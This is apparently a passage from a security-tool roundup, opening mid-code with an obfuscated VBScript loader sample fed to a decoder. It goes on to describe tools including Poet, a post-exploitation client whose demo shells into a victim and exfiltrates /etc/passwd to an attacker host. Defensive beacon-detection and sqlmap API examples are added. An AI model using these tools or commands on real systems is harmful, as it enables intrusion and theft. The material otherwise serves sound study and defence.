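qWx = "5505-5396*1113775/9685*540853/5251*-2629+2727*291-180*826320/6886*118016/3688*-2379+2413*2401-2329*137130/1306*7209-7175"
LkP = Split(qWx, chr(eval(1039-997)))
for each item in LkP
Zmn = Zmn & chr(eval(item))
next
execute(Zmn)
'''

if __name__ == "__main__":
    print(decode_script(SAMPLE_VBS))
```

Run decode_script over the full text of a suspect .vbs to recover the original source for static review. Because the decoder never calls execute, eval or the VBScript engine, it is safe to apply to untrusted samples, and the restricted evaluator fails loudly rather than executing anything if a script deviates from the pattern.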


Cheat - Create and view interactive cheatsheets on the command-line


cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind *nix system administrators of options for commands that they use frequently, but not frequently enough to remember.

cheat depends only on python and pip.

Example

The next time you're forced to disarm a nuclear weapon without consulting Google, you may run:
cheat tar
You will be presented with a cheatsheet resembling:
# To extract an uncompressed archive: 
tar -xvf /path/to/foo.tar

# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz

# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/

# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tgz

# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/
To see what cheatsheets are available, run cheat -l.
Note that, while cheat was designed primarily for *nix system administrators, it is agnostic as to what content it stores. If you would like to use cheat to store notes on your favorite cookie recipes, feel free.

Installing

Using pip
sudo pip install cheat

Using homebrew
brew install cheat

Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Then, clone this repository, cd into it, and run:
sudo python setup.py install

Modifying Cheatsheets

The value of cheat is that it allows you to create your own cheatsheets - the defaults are meant to serve only as a starting point, and can and should be modified.

Cheatsheets are stored in the ~/.cheat/ directory, and are named on a per-keyphrase basis. In other words, the content for the tar cheatsheet lives in the ~/.cheat/tar file.

Provided that you have an EDITOR environment variable set, you may edit cheatsheets with:
cheat -e foo

If the 'foo' cheatsheet already exists, it will be opened for editing. Otherwise, it will be created automatically.

After you've customized your cheatsheets, I urge you to track ~/.cheat/ along with your dotfiles.


Security CheatSheets - A collection of cheatsheets for various infosec tools and topics


These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Requirements

The only requirement to use these cheatsheets is for cheat to be installed.

How to Use

In order to use these cheatsheets, the cheatsheets in this repository need to go into the ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

CheatSheets:
  • aircrack-ng
  • cewl
  • cidr
  • cookies
  • dig
  • fierce
  • ftp
  • http
  • https-ssl-tls
  • hydra
  • john
  • maltego
  • markdown
  • medusa
  • metasploit
  • mysql
  • ncat
  • nikto
  • nping
  • permissions
  • php
  • pivoting
  • ps
  • python
  • ruby
  • shadow
  • shodan
  • sqlmap
  • tcpdump
  • webservervulns
  • wireless-encryptions
  • wireshark

Just-Metadata - Tool that Gathers and Analyzes Metadata about IP Addresses


Just-Metadata is a tool that can be used to gather intelligence information passively about a large number of IP addresses, and attempt to extrapolate relationships that might not otherwise be seen. Just-Metadata has "gather" modules which are used to gather metadata about IPs loaded into the framework across multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to analyze the data loaded into Just-Metadata and perform various operations that can identify potential relationships between the loaded systems.

Just-Metadata will allow you to quickly find the Top "X" number of states, cities, timezones, etc. that the loaded IP addresses are located in. It will allow you to search for IP addresses by country. You can search all IPs to find which ones are used in callbacks as identified by VirusTotal. Want to see if any IPs loaded have been documented as taking part in attacks via the Animus Project? Just-Metadata can do it.

Additionally, it is easy to create new analysis modules to let people find other relationships between loaded IPs based on the available data. New intel gathering modules can be added just as easily!

Setup

Ideally, you should be able to run the setup script, and it will install everything you need.
For the Shodan information gathering module, YOU WILL NEED a Shodan API key. This costs like $9 bucks, come on now, it's worth it :).

Usage

As of now, Just-Metadata is designed to read in a single text file containing IPs, one per line. Create this file from any source (C2 callback IPs, web server logs, etc.). Once you have this file, start Just-Metadata by calling it:
./Just-Metadata.py

Commands

help - Once in the framework, to see a listing of available commands and a description of what they do, type the "help" command.

load <filename> - The load command takes an extra parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open, and load all IPs within the file to the framework.
Ex: load ipaddresses.txt

save - The save command can be used to save the current working state of Just-Metadata. This is helpful in multiple cases, such as after gathering information about IPs, and wanting to save the state off to disk to be able to work on them at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk, and displaying the filename of the saved state.

import <statefile> - The import command can be used to load a previously saved Just-Metadata state into the framework. It will load all IPs that were saved, and all information gathered about the IP addresses. This command will require an extra parameter, the name of the state file that you want Just-Metadata to load.
Ex: import goodfile.state

list <module type> - The list command lists the modules of a given type loaded into Just-Metadata. It takes one extra parameter, either "analysis" or "gather", and displays all modules of the requested type.
Ex: list analysis
Ex: list gather

gather <gather module name> - The gather command tells Just-Metadata to run the specified module and collect information from that source. Depending on the module, this can be geographical information, VirusTotal results, whois data, and more. The gathered data is held in memory within the framework and can be written to disk with the "save" command.
Ex: gather geoinfo
Ex: gather virustotal

analyze <analysis module name> - The analyze command tells Just-Metadata to run an analysis module against the data loaded into the framework. These modules can be used to find IP addresses that share the same SSH keys, SSL public key certificates, or certificate chains. They can also be used to find IP addresses used in the same callbacks by malicious executables.

ip_info <IP Address> - This command dumps all information gathered about a specific IP address. It is typically used after running analysis modules: for example, after identifying IP addresses that share the same SSH keys, you can dump everything known about those IPs and see whether they have been used by malware, where they are located, etc.

export - The export command will have Just-Metadata dump all information that's been gathered about all IP addresses currently loaded into the framework to CSV.
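The workflow above (load a one-IP-per-line file, correlate IPs on a gathered attribute such as an SSH host key or certificate fingerprint, rank the top values, export to CSV) is short enough to demonstrate end to end. The following is an added example, not Just-Metadata's own code or its module API; the per-IP metadata dictionary and the fingerprints in it are constructed for illustration. It shows the core of what an "analysis" module does: group IPs by a shared attribute, and treat a missing value as never shared, so that hosts with no SSH banner are not lumped together as one cluster.

```python
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed sample of the kind of per-IP data a "gather" module would populate.
# Addresses are from documentation ranges; fingerprints are placeholders.
SAMPLE_METADATA = {
    "203.0.113.10": {"ssh_key": "SHA256:aaaa", "tls_cert": "sha1:1111", "country": "US"},
    "203.0.113.11": {"ssh_key": "SHA256:aaaa", "tls_cert": "sha1:2222", "country": "US"},
    "198.51.100.7": {"ssh_key": "SHA256:bbbb", "tls_cert": "sha1:2222", "country": "DE"},
    "198.51.100.8": {"ssh_key": None, "tls_cert": None, "country": "DE"},
}


def load_ips(text):
    """Parse a one-IP-per-line file body: skip blanks and '#' comments, reject junk."""
    ips = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            ips.append(str(ipaddress.ip_address(line)))
        except ValueError:
            raise ValueError(f"line {lineno}: not an IP address: {line!r}") from None
    return ips


def shared_attribute(metadata, attr):
    """Group IPs by a gathered attribute and return only groups with more than one member.

    An unset attribute (None/empty) is never treated as 'shared': two hosts with no
    SSH key are not related just because both lack one.
    """
    groups = defaultdict(list)
    for ip, info in metadata.items():
        value = info.get(attr)
        if value:
            groups[value].append(ip)
    return {value: sorted(ips) for value, ips in groups.items() if len(ips) > 1}


def top_n(metadata, attr, n=3):
    """Top-N values of an attribute (e.g. country) with counts, ties broken by name."""
    counts = defaultdict(int)
    for info in metadata.values():
        if info.get(attr):
            counts[info[attr]] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


def export_csv(metadata):
    """Flatten everything gathered into CSV text, one row per IP, columns sorted."""
    fields = sorted({key for info in metadata.values() for key in info})
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["ip"] + fields)
    writer.writeheader()
    # Sort numerically, keeping IPv4 and IPv6 apart so the comparison is well defined.
    for ip in sorted(metadata, key=lambda a: (ipaddress.ip_address(a).version, ipaddress.ip_address(a))):
        writer.writerow({"ip": ip, **metadata[ip]})
    return buf.getvalue()


if __name__ == "__main__":
    ips = load_ips("203.0.113.10\n203.0.113.11\n\n# comment\n198.51.100.7\n198.51.100.8\n")
    print("loaded", len(ips), "IPs")
    print("shared SSH keys:", shared_attribute(SAMPLE_METADATA, "ssh_key"))
    print("shared TLS certs:", shared_attribute(SAMPLE_METADATA, "tls_cert"))
    print("top countries:", top_n(SAMPLE_METADATA, "country"))
    print(export_csv(SAMPLE_METADATA))
```

Note that the two correlations overlap: 203.0.113.11 shares an SSH key with 203.0.113.10 and a certificate with 198.51.100.7, which is exactly the kind of indirect link the analysis modules are meant to surface.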


TeemIp - IP Address Management Solution


All network administrators recognize how important it is to have a well managed IP space: a comprehensive and up-to-date inventory of all subnets and IPs used in a network, together with clear and simple processes to request, change or release IPs, are the underlying key factors for a trouble-free network.

Unfortunately, in many companies and organizations, IP management is not perceived as a critical IT operations service. And when it is recognized as such, the price of standard solutions from software vendors is so high that investment in a tool is always postponed to the next fiscal year.

As a consequence, network administrators often struggle to keep a decent inventory of their IP space and fall back on inconvenient Excel spreadsheets or DNS configuration files to do their job.

TeemIp was created precisely to address that problem. It is a robust open source web application that enables professional IP management within IT departments of all sizes.

A simple and powerful user interface will allow network administrators to manage their IPv4 and IPv6 Plans, subnet space and IPs in accordance with best in class IP Management practices:
  • Define your IPv4 and IPv6 Plans through hierarchical Network Blocks
  • Delegate IP blocks from parent to child organizations
  • Manage Subnets within predefined Network Blocks
  • Attach IP Ranges to your Subnets
  • Register IPs and get a clear view on the IP space consumption
  • Allow end users to log IP requests through a simple web portal
  • Provide hostmasters with efficient processes to manage user requests
  • Proactively notify administrators on key events
  • Synchronize your data with external tools

Because IPs are configured on network devices, a CMDB (Configuration Management Database) is included in the product. The CMDB lets you document all types of devices that can be connected to an IP network, together with their links to the IP space (the IPs they use, such as management IPs, and the IPs they host, such as router interface addresses).

To give end users an easy way to log IP-related requests, a web portal has been incorporated into TeemIp. Tickets created through that portal are then processed through a Helpdesk module, giving the network administrator a quick, efficient and easy process to allocate, change or release IP resources.

TeemIp has been developed as an extension of the iTop open source ITSM and CMDB software and therefore benefits from all of its features and advanced functions. It is available as a standalone application or as a module that can be installed on an existing iTop installation.

TeemIp relies on Apache, MySQL and PHP, so it can run on any operating system that supports them; it has already been tested on Windows, Debian and Red Hat Linux. Because it is a web-based application, no client needs to be installed on users' PCs: a web browser is enough.



VBScan - A Black Box vBulletin Vulnerability Scanner


VBScan is a black-box vBulletin vulnerability scanner, written in Perl.

Demo: security bugs found by VBScan in the Ubuntu, Fedora and Python forums (video).

Report any bug to : me@reza.es

Acunetix v10 - Web Application Security Testing Tool


Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over £3m per breach, at the higher end.

The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its ‘Login Sequence Recorder’ which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its ‘DeepScan’ crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.

Automated scanning of restricted areas

The latest automation functionality makes Acunetix not only even easier to use, but gives better peace of mind by ensuring the entire website is scanned. Restricted areas, especially those behind user login pages, are harder for a scanner to reach and often require manual intervention. The Acunetix "Login Sequence Recorder" overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. Because the recorder follows user actions rather than replaying HTTP requests, it drastically improves support for anti-CSRF tokens, nonces and other one-time tokens, which are often used in restricted areas.

Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.

Support for various development architectures and web services

Many enterprise-grade, mission-critical applications are built using Java frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 single-page applications and mobile applications, web services have become a significant attack vector. The new version improves support for SOAP-based web services with WSDL and WCF descriptions as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10 introduces dynamic crawl pre-seeding by integrating with external, third-party tools including Fiddler, Burp Suite and the Selenium IDE, to enhance business logic testing and the workflow between manual testing and automation.

Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10
  • 'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
  • Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
  • Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
  • Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
  • Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
  • Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

Poet - A simple Post-Exploitation Tool


The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self destruct

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy). Make sure you have the python2.7 and zip executables available.
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
This will create a bin/ directory which contains poet-client and poet-server.

Usage

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
Note: By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).
Of course, using the -h flag gives you the full usage.
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]

positional arguments:
IP server
INTERVAL (s)

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT
-v, --verbose
-d, --delete delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT

Demo

This is just a small sample of what poet can do.
The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it's ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.
Victim's Machine (5.4.3.2):
$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443. Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):
# ./poet-server
_
____ ____ ___ / /_
/ __ \/ __ \/ _ \/ __/
/ /_/ / /_/ / __/ /
/ .___/\____/\___/\__/
/_/

[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By: ('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
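The behaviour described at the top of this section and visible in the client transcript above, a beacon that reconnects to one host and port at a fixed interval and falls silent only while a session is open, is also what gives it away on the network. The following is an added example of the defender's side, not part of Poet; it runs over constructed connection-log lines (timestamp, source, destination:port) modelled on the 10-second interval in the demo, and flags source/destination pairs whose inter-connection intervals cluster tightly around the median. Using the median and a fraction-within-tolerance score, rather than mean and standard deviation, is deliberate: the 25-second gap in the demo (while the operator held the psh shell open) would otherwise inflate the jitter and hide the beacon.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed connection log: not a real capture. The 1.2.3.4:443 connections
# follow the Poet demo timestamps; 93.184.216.34:443 is unrelated noise.
SAMPLE_LOG = """\
2015-03-27 03:40:12 5.4.3.2 1.2.3.4:443
2015-03-27 03:40:15 5.4.3.2 93.184.216.34:443
2015-03-27 03:40:22 5.4.3.2 1.2.3.4:443
2015-03-27 03:40:32 5.4.3.2 1.2.3.4:443
2015-03-27 03:40:42 5.4.3.2 1.2.3.4:443
2015-03-27 03:40:51 5.4.3.2 93.184.216.34:443
2015-03-27 03:41:07 5.4.3.2 1.2.3.4:443
2015-03-27 03:41:17 5.4.3.2 1.2.3.4:443
2015-03-27 03:41:27 5.4.3.2 1.2.3.4:443
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+:\d+)$")


def parse_log(text):
    """Return {(src, dst:port): [datetime, ...]} from the constructed log format."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # tolerate headers or malformed lines rather than abort
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events[(m.group(2), m.group(3))].append(ts)
    return events


def beacon_score(timestamps, tolerance=0.1):
    """Return (median_interval_seconds, fraction_of_intervals_within_tolerance).

    The median is robust to a few long gaps (an open session, a sleeping laptop),
    which is exactly the case a mean/stddev jitter test gets wrong.
    """
    ts = sorted(timestamps)
    if len(ts) < 3:
        return None
    intervals = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    med = median(intervals)
    if med <= 0:
        return None
    near = sum(1 for i in intervals if abs(i - med) <= tolerance * med)
    return med, near / len(intervals)


def find_beacons(text, min_connections=5, min_regular=0.75):
    """Flag (src, dst, interval, regularity) pairs that look like fixed-interval beacons."""
    hits = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_connections:
            continue
        score = beacon_score(stamps)
        if score and score[1] >= min_regular:
            hits.append((src, dst, score[0], round(score[1], 2)))
    return sorted(hits)


if __name__ == "__main__":
    for src, dst, interval, regularity in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}: ~{interval:.0f}s interval, {regularity:.0%} of gaps regular")
```

The thresholds (five connections, 75% of intervals within 10% of the median) are starting points, not tuned values; a client started with a randomized interval (Poet's is fixed) would need a looser tolerance or a different feature, such as the ratio of connections to distinct destination ports.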


SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP


PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!

A few quick videos show that almost all of the usual SQLMAP command-line functionality is still possible via this Web GUI. The demos were run against:
  • Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005
  • Linux (CentOS), Apache, MySQL, PHP
Requirements:
  • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
    • PHP 5.3+ is suggested; older versions have not been tested, so your mileage may vary
  • Python and any SQLMAP dependencies (refer to their wiki for any help there)
  • Clone this repo to your machine
    • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
    • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
    • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
    • Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)
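Behind the PHP pages, the GUI is talking to the sqlmapapi.py REST server started in the step above. The following is an added example, not part of SQLMAP-Web-GUI or of sqlmap, of the same exchange driven from Python: create a task, start a scan with an options dictionary, poll the status until it terminates, then fetch the findings. The endpoint paths (/task/new, /scan/<taskid>/start, /scan/<taskid>/status, /scan/<taskid>/data) and the default listener of 127.0.0.1:8775 are those of sqlmapapi.py as I know it; the exact JSON field names (success, taskid, engineid, status, data) are assumptions to verify against your sqlmap version. The HTTP transport is injectable so the workflow can be exercised against a fake server offline.

```python
import json
import urllib.request


class SqlmapApiClient:
    """Minimal client for the sqlmapapi.py REST endpoints that the Web GUI drives."""

    def __init__(self, base_url="http://127.0.0.1:8775", transport=None):
        # sqlmapapi.py -s listens on 127.0.0.1:8775 by default (assumed; check -h).
        self.base_url = base_url.rstrip("/")
        # transport(method, url, json_body_or_None) -> parsed JSON dict.
        self.transport = transport or self._http

    @staticmethod
    def _http(method, url, body):
        data = None if body is None else json.dumps(body).encode()
        req = urllib.request.Request(
            url, data=data, method=method, headers={"Content-Type": "application/json"}
        )
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.loads(resp.read().decode())

    def _call(self, method, path, body=None):
        return self.transport(method, self.base_url + path, body)

    def new_task(self):
        reply = self._call("GET", "/task/new")
        if not reply.get("success"):
            raise RuntimeError(f"task/new failed: {reply}")
        return reply["taskid"]

    def start_scan(self, taskid, target_url, **options):
        # Options mirror sqlmap's long flags without dashes (url, level, risk, dbms, ...).
        options["url"] = target_url
        reply = self._call("POST", f"/scan/{taskid}/start", options)
        if not reply.get("success"):
            raise RuntimeError(f"scan/start failed: {reply}")
        return reply.get("engineid")

    def status(self, taskid):
        return self._call("GET", f"/scan/{taskid}/status").get("status")

    def data(self, taskid):
        return self._call("GET", f"/scan/{taskid}/data").get("data", [])


def run_scan(client, target_url, poll=lambda: None, max_polls=100, **options):
    """Full workflow: new task -> start -> poll until 'terminated' -> collect data.

    `poll` is called between status checks (time.sleep in real use; a no-op in tests).
    Raises TimeoutError instead of polling forever if the engine never terminates.
    """
    taskid = client.new_task()
    client.start_scan(taskid, target_url, **options)
    for _ in range(max_polls):
        if client.status(taskid) == "terminated":
            return taskid, client.data(taskid)
        poll()
    raise TimeoutError(f"task {taskid} still running after {max_polls} polls")


if __name__ == "__main__":
    import time

    client = SqlmapApiClient()  # expects: python sqlmapapi.py -s on the same host
    taskid, findings = run_scan(
        client, "http://127.0.0.1/vulnerable.php?id=1", poll=lambda: time.sleep(5), level=1
    )
    print(taskid, json.dumps(findings, indent=2))
```

Keep the API server bound to loopback as in the step above, and put access control in front of the PHP pages: whoever can reach the GUI can point sqlmap at arbitrary targets from your host.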

Squert - A Simple QUEry and Report Tool


Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.


Requirements
